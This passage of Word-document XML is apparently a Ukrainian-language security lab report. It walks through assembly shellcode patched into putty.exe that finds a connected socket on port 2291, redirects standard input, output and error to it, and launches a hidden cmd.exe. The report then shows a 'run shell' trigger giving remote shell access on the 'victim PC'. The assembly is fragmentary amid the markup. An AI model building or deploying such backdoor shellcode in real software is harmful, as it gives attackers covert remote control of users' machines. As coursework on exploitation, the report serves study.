          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:r w:rsidR="00FE3BC5" w:rsidRPr="00B47F67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2_32.</w:t>
      </w:r>
      <w:r w:rsidR="00FE3BC5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A73F1" w14:textId="45333A71" w:rsidR="00C44FA2" w:rsidRPr="0073581D" w:rsidRDefault="00796D30" w:rsidP="00692C95">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C44FA2" w:rsidRPr="00043621">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004D1B2C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Знаходить</w:t>
      </w:r>
      <w:r w:rsidR="00BD19E0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> сокет </w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>клієнта, перебираючи всі сокет</w:t>
      </w:r>
      <w:r w:rsidR="00B368FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> починаючи з 0. </w:t>
      </w:r>
      <w:r w:rsidR="00255AC0">
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">знаки цільового сокета: </w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">-адреса </w:t>
      </w:r>
      <w:r w:rsidR="00A06848">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>повинна</w:t>
      </w:r>
      <w:r w:rsidR="00A06848">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бути</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00043621" w:rsidRPr="00043621">
        <w:t>0 (</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INADDR</w:t>
      </w:r>
      <w:r w:rsidR="00043621" w:rsidRPr="00043621">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANY</w:t>
      </w:r>
      <w:r w:rsidR="00043621" w:rsidRPr="00043621">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00043621">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, а порт </w:t>
      </w:r>
      <w:r w:rsidR="003C6C71">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">повинен бути </w:t>
      </w:r>
      <w:r w:rsidR="003C6C71" w:rsidRPr="003C6C71">
        <w:t>2291</w:t>
      </w:r>
      <w:r w:rsidR="003C6C71">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC8544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Find client socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B815CBE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Iterate through sockets and find one with ip != INADDR_ANY and port == 2291</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFB319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5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FF6A38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</w:p>
    <w:p w14:paraId="5716AA43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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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nextSocket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EA090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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B26E15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ea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dx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stAddrClient]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35F731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ea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8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cbAddrClient]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58EB4A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all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Getsockname]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40476394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0DC3FB9C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iSockClient], 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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32985728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nc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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195457F3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ea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stAddrClient]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BEC484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5885E17B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3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FF6A38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</w:p>
    <w:p w14:paraId="23280A3F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3d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word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FF6A38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4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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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stAddrClient.sin_addr = IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DCF34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5CA2E032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cx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FF6A38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</w:p>
    <w:p w14:paraId="6F7FC3FD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x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ord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FF6A38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             </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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stAddrClient.sin_port = PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EBB59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all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pNtohs]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5F150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4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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF77BCF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24555D56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Check IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA7B5D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mp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3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FF6A38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                </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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INADDR_ANY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B97CC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je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.nextSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B2E13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183354E3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Check PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C54F8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FF6A38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mp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4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FF6A38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291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             </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F647306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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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jne</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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.nextSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DB194" w14:textId="77777777" w:rsidR="00FF6A38" w:rsidRPr="00FF6A38" w:rsidRDefault="00FF6A38" w:rsidP="00FF6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FF6A38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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6A38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endLoop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB8FB2" w14:textId="77777777" w:rsidR="00FF6A38" w:rsidRPr="00A91B24" w:rsidRDefault="00FF6A38" w:rsidP="00692C95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F761189" w14:textId="0D7C4E8E" w:rsidR="00BE4173" w:rsidRPr="00A20599" w:rsidRDefault="00796D30" w:rsidP="00D66B52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00887B8D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DD458C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Ініціалізує </w:t>
      </w:r>
      <w:r w:rsidR="00DD458C" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">структуру </w:t>
      </w:r>
      <w:r w:rsidR="00A20599" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>STARTUPINFOA</w:t>
      </w:r>
      <w:r w:rsidR="00A20599">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> таким чином, щоб всі стандартні потоки </w:t>
      </w:r>
      <w:r w:rsidR="006960A5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(потік вводу, виводу, потік помилок)</w:t>
      </w:r>
      <w:r w:rsidR="00767476">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> перенаправити на знайдений сокет: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAD908" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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Initialize STARTUPINFOA structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954F4A0" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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4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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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iSockClient]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B398D8C" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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ea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A55AAC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, [stStartupInfo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7EB28" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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word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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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A55AAC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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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4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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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stStartupInfo.cb = sizeof(STARTUPINFOA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17053952" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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word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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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A55AAC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64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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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stStartupInfo.wShowWindow = SW_HIDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74C5D2" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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word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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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A55AAC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60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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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x100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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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stStartupInfo.dwFlags = STARTF_USESTDHANDLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5EAA0" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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A55AAC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80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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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4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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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stStartupInfo.hStdInput = sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996ADBA" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55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55AAC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A55AAC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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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A55AAC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88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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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4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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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stStartupInfo.hStdOutput = sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34939BDA" w14:textId="77777777" w:rsidR="00A55AAC" w:rsidRPr="00A55AAC" w:rsidRDefault="00A55AAC" w:rsidP="00A55A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A55AAC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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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qword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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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2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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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96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], </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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r14</w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A55AAC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; stStartupInfo.hStdError = sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395F54" w14:textId="77777777" w:rsidR="00B47F67" w:rsidRDefault="00B47F67" w:rsidP="00D66B52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CF08E7" w14:textId="130EBF80" w:rsidR="002D09A4" w:rsidRPr="002B3B66" w:rsidRDefault="00796D30" w:rsidP="00D66B52">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="002D09A4" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AE7D84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Змінює кодування на </w:t>
      </w:r>
      <w:r w:rsidR="00AE7D84" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">UTF-8 </w:t>
      </w:r>
      <w:r w:rsidR="00AE7D84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та виконує</w:t>
      </w:r>
      <w:r w:rsidR="00847BA6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00847BA6" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidR="002B3B66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0EE17" w14:textId="77777777" w:rsidR="000B3990" w:rsidRPr="00FA6EC2" w:rsidRDefault="000B3990" w:rsidP="00A90D0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EBEDD7" w14:textId="7BB0A100" w:rsidR="00A90D0D" w:rsidRPr="00BF5DE1" w:rsidRDefault="00A90D0D" w:rsidP="00A90D0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Скомпілюємо шелкод </w:t>
      </w:r>
      <w:r w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>tas</w:t>
      </w:r>
      <w:r w:rsidR="000F2B28" w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0628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="00E109E0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виведемо його</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C2163">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">допомогою </w:t>
      </w:r>
      <w:r w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>patcher</w:t>
      </w:r>
      <w:r w:rsidRPr="0057235B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2B28">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA229C9" w14:textId="77777777" w:rsidR="00DB63B8" w:rsidRDefault="00A90D0D" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00DB63B8" w:rsidRPr="00DB63B8">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>nasm -f bin task2_sc.asm -o task2_sc.obj &amp;&amp; python ../patcher.py --exe putty.exe --sc task2_sc.obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561F474" w14:textId="5538D076" w:rsidR="00A90D0D" w:rsidRDefault="00E971F5" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715590E9" wp14:editId="483A31EF">
            <wp:extent cx="6645910" cy="4391660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1660977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771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B736" w14:textId="44660376" w:rsidR="00940753" w:rsidRPr="00A41CBE" w:rsidRDefault="009578DA" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Створимо простий сервер </w:t>
      </w:r>
      <w:r w:rsidR="00EA012A" w:rsidRPr="000B22E8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00EA012A" w:rsidRPr="004129A0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00EA012A" w:rsidRPr="000B22E8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidR="00EA012A" w:rsidRPr="00471C62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EA012A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">який буде </w:t>
      </w:r>
      <w:r w:rsidR="00C13012">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>приймати всі</w:t>
      </w:r>
      <w:r w:rsidR="000935A6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C13012">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>з'єднання</w:t>
      </w:r>
      <w:r w:rsidR="00484412">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та очікувати </w:t>
      </w:r>
      <w:r w:rsidR="00471C62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">від клієнта </w:t>
      </w:r>
      <w:r w:rsidR="00F547B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рядок</w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5" w:rsidRPr="00471C62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5" w:rsidRPr="00471C62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00C46DA5" w:rsidRPr="00471C62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00F414E6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00940753">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Скомпілюємо і отримаємо </w:t>
      </w:r>
      <w:r w:rsidR="00940753" w:rsidRPr="00873B19">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00940753" w:rsidRPr="00C12095">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00940753" w:rsidRPr="00873B19">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="007D00D2" w:rsidRPr="00C12095">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819EEAB" w14:textId="5FB09E28" w:rsidR="0061332F" w:rsidRPr="00D946F6" w:rsidRDefault="003C1F25" w:rsidP="0061332F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На ПК жертви в</w:t>
      </w:r>
      <w:r w:rsidR="0061332F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>иконаємо</w:t>
      </w:r>
      <w:r w:rsidR="00B97D74">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B97D74" w:rsidRPr="00873B19">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00B97D74" w:rsidRPr="00C12095">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00B97D74" w:rsidRPr="00873B19">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00B97D74">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15452144" w14:textId="07D774BD" w:rsidR="0061332F" w:rsidRDefault="00D84FBF" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FA632D3" wp14:editId="55F8C362">
            <wp:extent cx="4704762" cy="904762"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="43498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855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8FB2" w14:textId="37EABCDC" w:rsidR="00AC3F77" w:rsidRPr="008D3B46" w:rsidRDefault="00FD134B" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На хост ОС</w:t>
      </w:r>
      <w:r w:rsidR="007A0F30">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> підключимося до сервера</w:t>
      </w:r>
      <w:r w:rsidR="0083263D" w:rsidRPr="00B04DC3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0083263D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">введемо рядок </w:t>
      </w:r>
      <w:r w:rsidR="0083263D" w:rsidRPr="00B04DC3">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="0083263D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="0083263D" w:rsidRPr="00B04DC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0083263D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="0083263D" w:rsidRPr="00B04DC3">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00B04DC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B04DC3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">і отримаємо </w:t>
      </w:r>
      <w:r w:rsidR="001736A4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>шел</w:t>
      </w:r>
      <w:r w:rsidR="007A0F30">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51706A33" w14:textId="7D05072C" w:rsidR="00270413" w:rsidRPr="00845F87" w:rsidRDefault="00270413" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
